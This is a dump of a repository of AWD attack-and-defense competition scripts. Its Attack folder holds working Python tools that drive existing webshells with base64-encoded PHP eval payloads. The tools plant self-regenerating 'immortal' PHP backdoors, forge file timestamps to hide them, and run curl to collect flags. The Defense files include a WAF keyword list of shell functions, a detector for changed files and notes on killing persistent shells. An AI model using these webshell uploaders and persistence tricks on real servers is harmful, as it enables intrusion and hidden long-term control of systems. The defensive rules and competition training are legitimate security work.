├── AWD-Script ├── Attack │ ├── GetFlag.py │ ├── ListCreate.php │ ├── upload_shell.py │ ├── 不死马.php │ ├── 命令生成不死马.txt │ ├── 命令生成不死马_批量版.py │ └── 隐藏不死马测试版.php ├── Defense │ ├── linux文件监控脚本.py │ ├── waf.php │ ├── 修改curl.txt │ ├── 克制不死马.txt │ ├── 日志地址.txt │ └── 检测外来IP.sh ├── Python │ ├── GetFlag.py │ ├── attack.py │ ├── ipfind.py │ ├── main.py │ ├── upload_shell.py │ ├── url.py │ ├── 处理B段.py │ ├── 提交flag.py │ ├── 根据URL生成字典.py │ └── 靶机ping扫描.py └── Readme.md ├── LICENSE └── README.md /AWD-Script/Attack/GetFlag.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | import sys,requests,base64 4 | 5 | def loadfile(filepath): 6 | try : 7 | file = open(filepath,"rb") 8 | return str(file.read()) 9 | except : 10 | print "File %s Not Found!" %filepath 11 | sys.exit() 12 | 13 | def file_write(filepath,filecontent): 14 | file = open(filepath,"a") 15 | file.write(filecontent) 16 | file.close() 17 | 18 | def getflag(url,method,passwd,flag_path): 19 | #flag机的url 20 | flag_url="192.168.45.1" 21 | #print url 22 | #判断shell是否存在 23 | try : 24 | res = requests.get(url,timeout=3) 25 | except : 26 | print "[-] %s ERR_CONNECTION_TIMED_OUT" %url 27 | file_write(flag_path,"[-] %s ERR_CONNECTION_TIMED_OUT\n\n" %url) 28 | return 0 29 | if res.status_code!=200 : 30 | print "[-] %s Page Not Found!" 
%url 31 | file_write(flag_path,"[-] %s Page Not Found!\n\n" %url) 32 | return 0 33 | #执行命令来获取flag system,exec,passthru,`,shell_exec 34 | #a=@eval(base64_decode($_GET[z0]));&z0=c3lzdGVtKCJ3aG9hbWkiKTs= 35 | cmd = "curl "+flag_url 36 | #cmd = "whoami" 37 | getflag_cmd ="echo system(\"%s\");"%cmd 38 | data={} 39 | if method=='get': 40 | data[passwd]='@eval(base64_decode($_GET[z0]));' 41 | data['z0']=base64.b64encode(getflag_cmd) 42 | try: 43 | res = requests.get(url,params=data,timeout=3) 44 | #print res.url 45 | if res.content: 46 | content = url+"\n"+res.content+"\n\n" 47 | file_write(flag_path,content) 48 | print "[+] %s getflag sucessed!"%url 49 | else : 50 | print "[-] %s cmd exec response is null!"%url 51 | content = url+"\ncmd exec response is null!\n\n" 52 | file_write(flag_path,content) 53 | except : 54 | file_write(flag_path,"\n[+] %s Getflag Failed! You can check the shell's passwd!\n\n"%url) 55 | print "[+] %s Getflag Failed! You can check the shell's passwd!"%url 56 | elif method=='post': 57 | data['pass']='Sn3rtf4ck' 58 | data[passwd]='@eval(base64_decode($_POST[z0]));' 59 | data['z0']=base64.b64encode(getflag_cmd) 60 | try: 61 | res = requests.post(url,data=data,timeout=3) 62 | if res.content: 63 | content = url+"\n"+res.content+"\n\n" 64 | file_write(flag_path,content) 65 | print "[+] %s getflag sucessed!"%url 66 | else : 67 | print "[-] %s cmd exec response is null!"%url 68 | content = url+"\ncmd exec response is null!\n\n" 69 | file_write(flag_path,content) 70 | except: 71 | file_write(flag_path,"\n[+] %s Getflag Failed! You can check the shell's passwd!\n\n"%url) 72 | print "[+] %s Getflag Failed! 
You can check the shell's passwd!"%url 73 | 74 | 75 | 76 | if __name__ == '__main__': 77 | #存放flag的文件 78 | flag_path="./flag.txt" 79 | shellstr=loadfile("./webshell.txt") 80 | list = shellstr.split("\r\n") 81 | #print str(list) 82 | i = 0 83 | url={} 84 | passwd={} 85 | method={} 86 | for data in list: 87 | if data: 88 | ls = data.split(",") 89 | method_tmp = str(ls[1]) 90 | method_tmp = method_tmp.lower() 91 | if method_tmp=='post' or method_tmp=='get': 92 | url[i]=str(ls[0]) 93 | method[i]=method_tmp 94 | passwd[i]=str(ls[2]) 95 | i+=1 96 | else : 97 | print "[-] %s request method error!" %(str(ls[0])) 98 | file_write(flag_path,"[-] %s request method error!\n\n" %(str(ls[0]))) 99 | else : pass 100 | #print str(len(url)) 101 | for j in range(len(url)): 102 | #调用执行命令的模块 103 | #print str(j) 104 | #print "url is %s method is %s passwd is %s" %(url[j],method[j],passwd[j]) 105 | getflag(url=url[j],method=method[j],passwd=passwd[j],flag_path=flag_path) 106 | print "Getflag finished!" 107 | -------------------------------------------------------------------------------- /AWD-Script/Attack/ListCreate.php: -------------------------------------------------------------------------------- 1 | "; 8 | } 9 | ?> 10 | -------------------------------------------------------------------------------- /AWD-Script/Attack/upload_shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | 4 | import sys,requests,base64 5 | 6 | ''' 7 | Usage: 8 | 将所需要传shell的url放在webshell.txt中,格式如下: 9 | url(含http:// or https://),method(请求方式),passwd 10 | http://127.0.0.1:80/1110/x.php,post,x 11 | http://127.0.0.2/1110/x.php,post,x 12 | http://127.0.0.3/1110/x.php,post,x 13 | 14 | tips: 别在","前后放空格。 15 | ''' 16 | #获取靶机的绝对路径 17 | def getpath(url,method,passwd): 18 | data = {} 19 | if method == "get": 20 | data[passwd] = '@eval(base64_decode($_GET[z0]));' 21 | data['z0'] = 'ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107' 22 | res = 
requests.get(url,params=data) 23 | return res.content.strip() 24 | elif method == "post" : 25 | data[passwd] = '@eval(base64_decode($_POST[z0]));' 26 | data['z0'] = 'ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107' 27 | res = requests.post(url,data=data) 28 | #print data 29 | return res.content.strip() 30 | else : 31 | return 0 32 | 33 | #加载要上传的后门内容 34 | def loadfile(filepath): 35 | try : 36 | file = open(filepath,"rb") 37 | return str(file.read()) 38 | except : 39 | print "File %s Not Found!" %filepath 40 | sys.exit() 41 | 42 | #写马函数 43 | def upload(url,method,passwd): 44 | #http://127.0.0.1:80/1110/x.php,post,x 45 | ''' 46 | 1.http or https 47 | 2.端口要放在ip变量中 48 | 3.Rfile /1110/x.php 49 | ''' 50 | try: 51 | url.index("http") 52 | #去除http:// ==> 127.0.0.1:80/1110/x.php 53 | urlstr=url[7:] 54 | lis = urlstr.split("/") 55 | ip=str(lis[0]) 56 | Rfile = "" 57 | for i in range(1,len(lis)): 58 | Rfile = Rfile+"/"+str(lis[i]) 59 | except : 60 | urlstr=url[8:] 61 | lis = urlstr.split("/") 62 | ip=str(lis[0]) 63 | Rfile = "" 64 | for i in range(1,len(lis)): 65 | Rfile = Rfile+"/"+str(lis[i]) 66 | #判断shell是否存在 67 | try : 68 | res = requests.get(url,timeout=10) 69 | except : 70 | print "[-] %s ERR_CONNECTION_TIMED_OUT" %url 71 | return 0 72 | if res.status_code!=200 : 73 | print "[-] %s Page Not Found!" 
%url 74 | return 0 75 | 76 | #加载要写入的内容 77 | shellPath = "./shell.php" 78 | shell_content = loadfile(shellPath) 79 | 80 | #获取靶机的绝对路径 81 | Rpath = getpath(url,method,passwd)#D:/phpStudy/WWW/1110/x.php 82 | list0 = Rpath.split("/") 83 | Rpath = "" 84 | for i in range(0,(len(list0)-1)): 85 | Rpath = Rpath+list0[i]+"/" 86 | data = {} 87 | #判断method 88 | if method =="post" : 89 | data[passwd] = "@eval(base64_decode($_POST['z0']));" 90 | data['z0'] = 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7' 91 | data['z1'] = base64.b64encode(Rpath+"/fuck.php") 92 | data["z2"] = base64.b64encode(shell_content) 93 | #print data 94 | res = requests.post(url,data=data) 95 | elif method=="get" : 96 | data[passwd] = "@eval(base64_decode($_GET['z0']));" 97 | data['z0'] = 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX0dFVFsiejEiXSk7CiRjPWJhc2U2NF9kZWNvZGUoJF9HRVRbInoyIl0pOwokYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTsKJGM9c3RyX3JlcGxhY2UoIlxuIiwiIiwkYyk7CiRidWY9IiI7CmZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTEpCiAgICAkYnVmLj1zdWJzdHIoJGMsJGksMSk7CmVjaG8oQGZ3cml0ZShmb3BlbigkZiwidyIpLCRidWYpKTsKZWNobygifDwtIik7CmRpZSgpOw==' 98 | data['z1'] = base64.b64encode(Rpath+"/fuck.php") 99 | data["z2"] = base64.b64encode(shell_content) 100 | res = requests.post(url,params=data) 101 | else : 102 | print "method err!" 103 | sys.exit() 104 | 105 | #判断是否上传成功,失败直接跳过 106 | #print res.content 107 | if res.status_code!=200: 108 | print "[-] %s upload failed!" 
%ip 109 | return 0 110 | 111 | #激活不死马 112 | list=Rfile.split("/") 113 | b_url="http://"+ip 114 | max = len(list)-1 115 | for i in range(1,max): 116 | b_url=b_url+"/"+list[i] 117 | bsm_url = b_url+"/fuck.php" 118 | try : 119 | res = requests.get(bsm_url,timeout=3) 120 | except : 121 | pass 122 | #尝试访问不死马生成的shell 123 | shell_url = b_url+"/.index.php" 124 | res = requests.get(shell_url) 125 | if res.status_code!=200 : 126 | print "[-] %s create shell failed!" %bsm_url 127 | return 0 128 | #输出shell地址 129 | print "[+] %s upload sucessed!" %shell_url 130 | 131 | 132 | if __name__ == '__main__': 133 | shellstr=loadfile("./webshell.txt") 134 | list = shellstr.split("\r\n") 135 | #print str(list) 136 | i = 0 137 | url={} 138 | passwd={} 139 | method={} 140 | for data in list: 141 | if data: 142 | ls = data.split(",") 143 | method_tmp = str(ls[1]) 144 | method_tmp = method_tmp.lower() 145 | if method_tmp=='post' or method_tmp=='get': 146 | url[i]=str(ls[0]) 147 | method[i]=method_tmp 148 | passwd[i]=str(ls[2]) 149 | i+=1 150 | else : 151 | print "[-] %s request method error!" 
%(str(ls[0])) 152 | else : pass 153 | for j in range(len(url)): 154 | #print "url is %s method is %s passwd is %s" %(url[j],method[j],passwd[j]) 155 | upload(url=url[j],method=method[j],passwd=passwd[j]) 156 | -------------------------------------------------------------------------------- /AWD-Script/Attack/不死马.php: -------------------------------------------------------------------------------- 1 | '; 7 | //pass=Sn3rtf4ck 马儿用法:fuckyou.php?pass=Sn3rtf4ck&a=command 8 | while (1){ 9 | file_put_contents($file,$code); 10 | usleep(5000); 11 | } 12 | ?> 13 | -------------------------------------------------------------------------------- /AWD-Script/Attack/命令生成不死马.txt: -------------------------------------------------------------------------------- 1 | system('while true;do echo \'\' >fuck.php;sleep 0.1;done;'); 2 | 3 | 4 | ps -ax 可以查找到该进程 5 | -------------------------------------------------------------------------------- /AWD-Script/Attack/命令生成不死马_批量版.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | import sys,requests 4 | ''' 5 | 作用:向靶机发命令来写文件,文件名.index1.php 6 | webshell.txt 格式如下: 7 | http://127.0.0.1:80/1110/x.php,xost,x 8 | http://127.0.0.2/1110/xx.php,POST,x 9 | http://127.0.0.3/1011/x.php,get,3 10 | http://192.168.1.155/1110/x.php,post,x 11 | http://127.0.0.1/1110/y.php?pass=Sn3rtf4ck,get,a 12 | ''' 13 | 14 | def loadfile(filepath): 15 | try : 16 | file = open(filepath,"rb") 17 | return str(file.read()) 18 | except : 19 | print "File %s Not Found!" 
%filepath 20 | sys.exit() 21 | 22 | def cmd(url,method,passwd): 23 | #分割url ip 127.0.0.1:80 Rfile=/1111/x.php?pass=Sn3rtf4ck 24 | try: 25 | url.index("http") 26 | #去除http:// ==> 127.0.0.1:80/1110/x.php 27 | urlstr=url[7:] 28 | lis = urlstr.split("/") 29 | ip=str(lis[0]) 30 | Rfile = "" 31 | for i in range(1,len(lis)): 32 | Rfile = Rfile+"/"+str(lis[i]) 33 | except : 34 | urlstr=url[8:] 35 | lis = urlstr.split("/") 36 | ip=str(lis[0]) 37 | Rfile = "" 38 | for i in range(1,len(lis)): 39 | Rfile = Rfile+"/"+str(lis[i]) 40 | #判断shell是否存在 41 | try : 42 | res = requests.get(url,timeout=3) 43 | except : 44 | print "[-] %s ERR_CONNECTION_TIMED_OUT" %url 45 | return 0 46 | if res.status_code!=200 : 47 | print "[-] %s Page Not Found!" %url 48 | return 0 49 | #执行命令 system,exec,passthru,`,shell_exec 50 | #a=@eval(base64_decode($_GET[z0]));&z0=c3lzdGVtKCJ3aG9hbWkiKTs= 51 | data={} 52 | if method=='get': 53 | data[passwd]='@eval(base64_decode($_GET[z0]));' 54 | data['z0']='c3lzdGVtKCd3aGlsZSB0cnVlO2RvIGVjaG8gXCc8P3BocCBpZihtZDUoJF9QT1NUW3Bhc3NdKT09IjNhNTAwNjVlMTcwOWFjYzQ3YmEwYzkyMzgyOTQzNjRmIil7QGV2YWwoJF9QT1NUW2FdKTt9ID8+XCcgPi5pbmRleDEucGhwO3RvdWNoIC1tIC1kICIyMDE3LTExLTE3IDEwOjIxOjI2IiAuaW5kZXgxLnBocDtzbGVlcCA1O2RvbmU7Jyk7' 55 | try: 56 | res = requests.get(url,params=data,timeout=3) 57 | except : 58 | pass 59 | elif method=='post': 60 | data['pass']="Sn3rtf4ck" 61 | data[passwd]='@eval(base64_decode($_POST[z0]));' 62 | data['z0']='c3lzdGVtKCd3aGlsZSB0cnVlO2RvIGVjaG8gXCc8P3BocCBpZihtZDUoJF9QT1NUW3Bhc3NdKT09IjNhNTAwNjVlMTcwOWFjYzQ3YmEwYzkyMzgyOTQzNjRmIil7QGV2YWwoJF9QT1NUW2FdKTt9ID8+XCcgPi5pbmRleDEucGhwO3RvdWNoIC1tIC1kICIyMDE3LTExLTE3IDEwOjIxOjI2IiAuaW5kZXgxLnBocDtzbGVlcCA1O2RvbmU7Jyk7' 63 | try: 64 | res = requests.post(url,data=data,timeout=3) 65 | except: 66 | pass 67 | #print res.status_code 68 | ''' 69 | if res.status_code!=200 : 70 | print "[-] %s commad exec failed!" 
%url 71 | return 0 72 | ''' 73 | 74 | #检查shell是否存在。 75 | list=Rfile.split("/") 76 | b_url="http://"+ip 77 | max = len(list)-1 78 | for i in range(1,max): 79 | b_url=b_url+"/"+list[i] 80 | shell_url = b_url+"/.index1.php" 81 | res = requests.get(shell_url,timeout=3) 82 | if res.status_code!=200: 83 | print "[-] %s create shell failed!" %shell_url 84 | return 0 85 | else : 86 | print '[+] %s sucessed!' %shell_url 87 | 88 | 89 | if __name__ == '__main__': 90 | shellstr=loadfile("./webshell.txt") 91 | list = shellstr.split("\r\n") 92 | #print str(list) 93 | i = 0 94 | url={} 95 | passwd={} 96 | method={} 97 | for data in list: 98 | if data: 99 | ls = data.split(",") 100 | method_tmp = str(ls[1]) 101 | method_tmp = method_tmp.lower() 102 | if method_tmp=='post' or method_tmp=='get': 103 | url[i]=str(ls[0]) 104 | method[i]=method_tmp 105 | passwd[i]=str(ls[2]) 106 | i+=1 107 | else : 108 | print "[-] %s request method error!" %(str(ls[0])) 109 | else : pass 110 | #print str(len(url)) 111 | for j in range(len(url)): 112 | #调用执行命令的模块 113 | #print str(j) 114 | #print "url is %s method is %s passwd is %s" %(url[j],method[j],passwd[j]) 115 | cmd(url=url[j],method=method[j],passwd=passwd[j]) 116 | -------------------------------------------------------------------------------- /AWD-Script/Attack/隐藏不死马测试版.php: -------------------------------------------------------------------------------- 1 | '; 7 | //pass=Sn3rtf4ck 马儿用法:fuckyou.php?pass=Sn3rtf4ck&a=command 8 | while (1){ 9 | file_put_contents($file,$code); 10 | system('touch -m -d "2017-11-12 10:10:10" .index.php'); 11 | usleep(50000); 12 | } 13 | ?> 14 | -------------------------------------------------------------------------------- /AWD-Script/Defense/linux文件监控脚本.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | #Usage :python demo.py 4 | #Code by : AdminTony 5 | #QQ : 78941695 6 | #注意:要将此文件放在有读写权限的目录以及所有修改过的php必须在此目录或者该目录的子目录中。 7 | 
#作用:读取被修改过的文件,然后将文件的地址加上内容全部存放在txt 8 | 9 | 10 | 11 | import sys,subprocess,os 12 | #查找最近10分钟被修改的文件 13 | def scanfile(): 14 | #command: find -name '*.php' -mmin -10 15 | command = "find -name \'*.php\' -mmin -10" 16 | su = subprocess.Popen(command,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) 17 | STDOUT,STDERR = su.communicate() 18 | list = STDOUT.split("\n") 19 | #print str(list) 20 | #将文件处理成list类型然后返回。 21 | return list 22 | 23 | #读取文件: 24 | def loadfile(addr): 25 | data = "" 26 | #如果文件不存在就跳出函数 27 | try : 28 | file = open(addr,'r') 29 | data = file.read() 30 | except : 31 | return 0 32 | all_data = addr+"\n"+data+"\n\n" 33 | file1 = open("shell.txt",'a+') 34 | #避免重复写入 35 | try: 36 | shell_content = file1.read() 37 | except: 38 | shell_content = "null" 39 | #如果文件内容不为空再写入,避免写入空的。 40 | #print shell_content 41 | if data : 42 | if all_data not in shell_content: 43 | file1.write(all_data) 44 | file.close() 45 | file1.close() 46 | rm_cmd = "rm -rf "+addr 47 | su = subprocess.Popen(rm_cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) 48 | su.communicate() 49 | print "loadfile over : "+addr 50 | 51 | if __name__ == '__main__': 52 | while True: 53 | 54 | list = scanfile() 55 | if list : 56 | for i in range(len(list)): 57 | #如果list[i]为空就不读取了 58 | if list[i]: 59 | loadfile(str(list[i])) 60 | else : pass 61 | -------------------------------------------------------------------------------- /AWD-Script/Defense/waf.php: -------------------------------------------------------------------------------- 1 | $value) { 8 | if (substr($name, 0, 5) == 'HTTP_') $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5))))) ] = $value; 9 | } 10 | return $headers; 11 | } 12 | } 13 | $get = $_GET; 14 | $post = $_POST; 15 | $cookie = $_COOKIE; 16 | $header = getallheaders(); 17 | $files = $_FILES; 18 | $ip = $_SERVER["REMOTE_ADDR"]; 19 | $method = $_SERVER['REQUEST_METHOD']; 20 | $filepath = 
$_SERVER["SCRIPT_NAME"]; 21 | //rewirte shell which uploaded by others, you can do more 22 | foreach ($_FILES as $key => $value) { 23 | $files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']); 24 | file_put_contents($_FILES[$key]['tmp_name'], "virink"); 25 | } 26 | unset($header['Accept']); //fix a bug 27 | $input = array( 28 | "Get" => $get, 29 | "Post" => $post, 30 | "Cookie" => $cookie, 31 | "File" => $files, 32 | "Header" => $header 33 | ); 34 | //deal with 35 | $pattern = "select|insert|update|delete|and|or|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex"; 36 | $pattern.= "|file_put_contents|fwrite|curl|system|eval|assert"; 37 | $pattern.= "|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore"; 38 | $pattern.= "|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec"; 39 | $vpattern = explode("|", $pattern); 40 | $bool = false; 41 | foreach ($input as $k => $v) { 42 | foreach ($vpattern as $value) { 43 | foreach ($v as $kk => $vv) { 44 | if (preg_match("/$value/i", $vv)) { 45 | $bool = true; 46 | logging($input); 47 | break; 48 | } 49 | } 50 | if ($bool) break; 51 | } 52 | if ($bool) break; 53 | } 54 | } 55 | function logging($var) { 56 | date_default_timezone_set("Asia/Shanghai");//修正时间为中国准确时间 57 | $time=date("Y-m-d H:i:s");//将时间赋值给变量$time 58 | file_put_contents(LOG_FILENAME, "\r\n\r\n\r\n" . $time . "\r\n" . 
print_r($var, true) , FILE_APPEND); 59 | // die() or unset($_GET) or unset($_POST) or unset($_COOKIE); 60 | 61 | } 62 | waf(); 63 | ?> 64 | -------------------------------------------------------------------------------- /AWD-Script/Defense/修改curl.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ProbiusOfficial/AWD-Guide/b2abc57e5aab6c72edecf0d0ae970f7094686e37/AWD-Script/Defense/修改curl.txt -------------------------------------------------------------------------------- /AWD-Script/Defense/克制不死马.txt: -------------------------------------------------------------------------------- 1 | 1.ps -aux |grep shell.php 找到pid后杀掉进程就可以,你删掉脚本是起不了作用的,因为php执行的时候已经把脚本读进去解释成opcode运行了 2 | 3 | 2.重启php等web服务 4 | 5 | 3.用一个ignore_user_abort(true)脚本,一直竞争写入(断断续续)。usleep要低于对方不死马设置的值。 6 | 7 | 4.创建一个和不死马生成的马一样名字的文件夹。 8 | -------------------------------------------------------------------------------- /AWD-Script/Defense/日志地址.txt: -------------------------------------------------------------------------------- 1 | /var/log/apache2/ 2 | /usr/local/apache2/logs -------------------------------------------------------------------------------- /AWD-Script/Defense/检测外来IP.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #写自己队的ip 3 | ipA="172.22.60.230" 4 | ipB="172.22.60.231" 5 | ipC="172.22.60.232" 6 | while [ "1" = "1"] 7 | do 8 | hackip=`netstat -an | grep "ESTA" | awk '{print $5}' | cut -d ":" -f1` 9 | if [[ $ipA =~ $hackip -a $ipB =~ $hackip -a $ipC =~ $hackip ]] 10 | then 11 | echo `date` "安全!!!" > iplog.txt 12 | else 13 | #gnome-terminal -t "Warning! Warning!" 
-x bash -c "echo 有不明IP闯入!----'$hackip';exec bash;" 14 | echo `date` $hackip >> hackiplog.txt 15 | fi 16 | sleep 30 17 | done 18 | #iptables -A INPUT -s $hackip -j REJECT //屏蔽某个ip 19 | #iptables -L //查看防火墙策略 20 | #iptables -F //关闭防火墙策略 -------------------------------------------------------------------------------- /AWD-Script/Python/GetFlag.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | import sys,requests,base64 4 | 5 | def loadfile(filepath): 6 | try : 7 | file = open(filepath,"rb") 8 | return str(file.read()) 9 | except : 10 | print "File %s Not Found!" %filepath 11 | sys.exit() 12 | 13 | def file_write(filepath,filecontent): 14 | file = open(filepath,"a") 15 | file.write(filecontent) 16 | file.close() 17 | 18 | def getflag(url,method,passwd,flag_path): 19 | #flag机的url 20 | flag_url="192.168.45.1" 21 | #print url 22 | #判断shell是否存在 23 | try : 24 | res = requests.get(url,timeout=3) 25 | except : 26 | print "[-] %s ERR_CONNECTION_TIMED_OUT" %url 27 | file_write(flag_path,"[-] %s ERR_CONNECTION_TIMED_OUT\n\n" %url) 28 | return 0 29 | if res.status_code!=200 : 30 | print "[-] %s Page Not Found!" 
%url 31 | file_write(flag_path,"[-] %s Page Not Found!\n\n" %url) 32 | return 0 33 | #执行命令来获取flag system,exec,passthru,`,shell_exec 34 | #a=@eval(base64_decode($_GET[z0]));&z0=c3lzdGVtKCJ3aG9hbWkiKTs= 35 | cmd = "curl "+flag_url 36 | #cmd = "whoami" 37 | getflag_cmd ="echo system(\"%s\");"%cmd 38 | data={} 39 | if method=='get': 40 | data[passwd]='@eval(base64_decode($_GET[z0]));' 41 | data['z0']=base64.b64encode(getflag_cmd) 42 | try: 43 | res = requests.get(url,params=data,timeout=3) 44 | #print res.url 45 | if res.content: 46 | content = url+"\n"+res.content+"\n\n" 47 | file_write(flag_path,content) 48 | print "[+] %s getflag sucessed!"%url 49 | else : 50 | print "[-] %s cmd exec response is null!"%url 51 | content = url+"\ncmd exec response is null!\n\n" 52 | file_write(flag_path,content) 53 | except : 54 | file_write(flag_path,"\n[+] %s Getflag Failed! You can check the shell's passwd!\n\n"%url) 55 | print "[+] %s Getflag Failed! You can check the shell's passwd!"%url 56 | elif method=='post': 57 | data['pass']='Sn3rtf4ck' 58 | data[passwd]='@eval(base64_decode($_POST[z0]));' 59 | data['z0']=base64.b64encode(getflag_cmd) 60 | try: 61 | res = requests.post(url,data=data,timeout=3) 62 | if res.content: 63 | content = url+"\n"+res.content+"\n\n" 64 | file_write(flag_path,content) 65 | print "[+] %s getflag sucessed!"%url 66 | else : 67 | print "[-] %s cmd exec response is null!"%url 68 | content = url+"\ncmd exec response is null!\n\n" 69 | file_write(flag_path,content) 70 | except: 71 | file_write(flag_path,"\n[+] %s Getflag Failed! You can check the shell's passwd!\n\n"%url) 72 | print "[+] %s Getflag Failed! 
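You can check the shell's passwd!"%url 73 | 74 | 75 | 76 | if __name__ == '__main__': 77 | #存放flag的文件 78 | flag_path="./flag.txt" 79 | shellstr=loadfile("./webshell.txt") 80 | list = shellstr.split("\r\n") 81 | #print str(list) 82 | i = 0 83 | url={} 84 | passwd={} 85 | method={} 86 | for data in list: 87 | if data: 88 | ls = data.split(",") 89 | method_tmp = str(ls[1]) 90 | method_tmp = method_tmp.lower() 91 | if method_tmp=='post' or method_tmp=='get': 92 | url[i]=str(ls[0]) 93 | method[i]=method_tmp 94 | passwd[i]=str(ls[2]) 95 | i+=1 96 | else : 97 | print "[-] %s request method error!" %(str(ls[0])) 98 | file_write(flag_path,"[-] %s request method error!\n\n" %(str(ls[0]))) 99 | else : pass 100 | #print str(len(url)) 101 | for j in range(len(url)): 102 | #调用执行命令的模块 103 | #print str(j) 104 | #print "url is %s method is %s passwd is %s" %(url[j],method[j],passwd[j]) 105 | getflag(url=url[j],method=method[j],passwd=passwd[j],flag_path=flag_path) 106 | print "Getflag finished!" 107 | -------------------------------------------------------------------------------- /AWD-Script/Python/attack.py: --------------------------------------------------------------------------------
import os
import re
import sys
import url


# Records come from url.needlist: [ip, b[1], method, request_url, b[15]];
# only index 0 (ip), 2 (method) and 3 (url) are read here.
sqllist, xsslist, senlist = [], [], []

otherurl, xssip, sqlip, senip = [], [], [], []

feifa = []

# Signatures are substring matches against the request URL (few tokens carry
# word boundaries), so short tokens such as "print", "sleep" or "old" also
# fire on benign paths; a hit is a lead to inspect, not a verdict.
# re.findall on a pattern that contains groups returns per-group tuples,
# which is what gets printed for the SQL and sensitive-path signatures.
_SQL_RE = re.compile(r'product.php|preg_\w+|execute|echo|print|print_r|var_dump|(fp)open|^eval$|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|\(?:define|base64_decode\(|group\s+by.+\(|%20or%20|%20and%20|sleep|delay|nvarchar|exec|union|^select$|version|insert|information_schema|chr\(|concat|%bf|sleep\((\s*)(\d*)(\s*)\)|current|having|database', re.I)

_XSS_RE = re.compile(r'alert|^script$|<|>|%3E|%3c|>|\u003c|\u003e|&#x', re.I)

_SEN_RE = re.compile(r'\.{2,}|%2e{2,}|%252e{2,}|%uff0e{2,}0x2e{2,}|\./|\{FILE\}|%00+|json|\.shtml|\.pl|\.sh|\.do|\.action|zabbix|phpinfo|/var/|/opt/|/local/|/etc|/apache/|\.log|invest\b|\.xml|apple-touch-icon-152x152|\.zip|\.rar|\.asp\b|\.php|\.bak|\.tar\.gz|\bphpmyadmin\b|admin|\.exe|\.7z|\.zip|\battachments\b|\bupimg\b|uploadfiles|templets|template|data\b|forumdata|includes|cache|jmxinvokerservlet|vhost|bbs|host|wwwroot|\bsite\b|root|hytop|flashfxp|bak|old|mdb|sql|backup|^java$|class', re.I)


def find_attack(needlist):
    """Classify each log record in *needlist* and return the hit lists.

    Records whose method is not POST/HEAD/GET are counted in ``feifa``.
    The rest are matched against the SQL, XSS and sensitive-path
    signatures in that order (first hit wins) and appended to the
    module-level lists, which are returned as
    ``[xssip, sqlip, senip, sqllist, xsslist, senlist, otherurl]``.
    The module previously used ``re`` without importing it.
    """
    print('>>>>>>>开始检测攻击')

    for record in needlist:

        if record[2] != 'POST' and record[2] != 'HEAD' and record[2] != 'GET':
            feifa.append(record[0])
            print('非法请求:'+str(len(feifa))+'次'+str(len(list(set(feifa))))+'个ip')
            continue

        target = record[3]

        hits = _SQL_RE.findall(target)
        if hits:
            sqllist.append(record)
            sqlip.append(record[0])
            # was print(responsexss): that name is not bound in this branch
            print(hits)
            print('检测出sql攻击')
            print(record)
            continue

        hits = _XSS_RE.findall(target)
        if hits:
            xsslist.append(record)
            xssip.append(record[0])
            print(hits)
            print('检测出xss攻击')
            print(record)
            continue

        hits = _SEN_RE.findall(target)
        if hits:
            senlist.append(record)
            senip.append(record[0])
            print(hits)
            print('检测出敏感目录扫描')
            print(record)
            continue

        otherurl.append(record)

    print('>>>>>>>攻击检测完毕')

    return [xssip, sqlip, senip, sqllist, xsslist, senlist, otherurl]
-------------------------------------------------------------------------------- /AWD-Script/Python/ipfind.py: -------------------------------------------------------------------------------- 1 | import re 2 | import urllib.request 3 | 4 | def url_open(ip): 5 | 6 | url = 'http://www.ip138.com/ips138.asp?ip='+ip 7 | 8 | response = urllib.request.urlopen(url) 9 | 10 | html = response.read().decode('gb2312') 11 | 12 | return html 13 | 14 | 15 | def find_ip(html): 16 | 17 | a = 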
r'本站数据.{20,}' 18 | 19 | p = re.compile(a,re.I) 20 | 21 | response = re.findall(p,html) 22 | 23 | for i in response: 24 | 25 | b = i 26 | 27 | response = re.split(r'
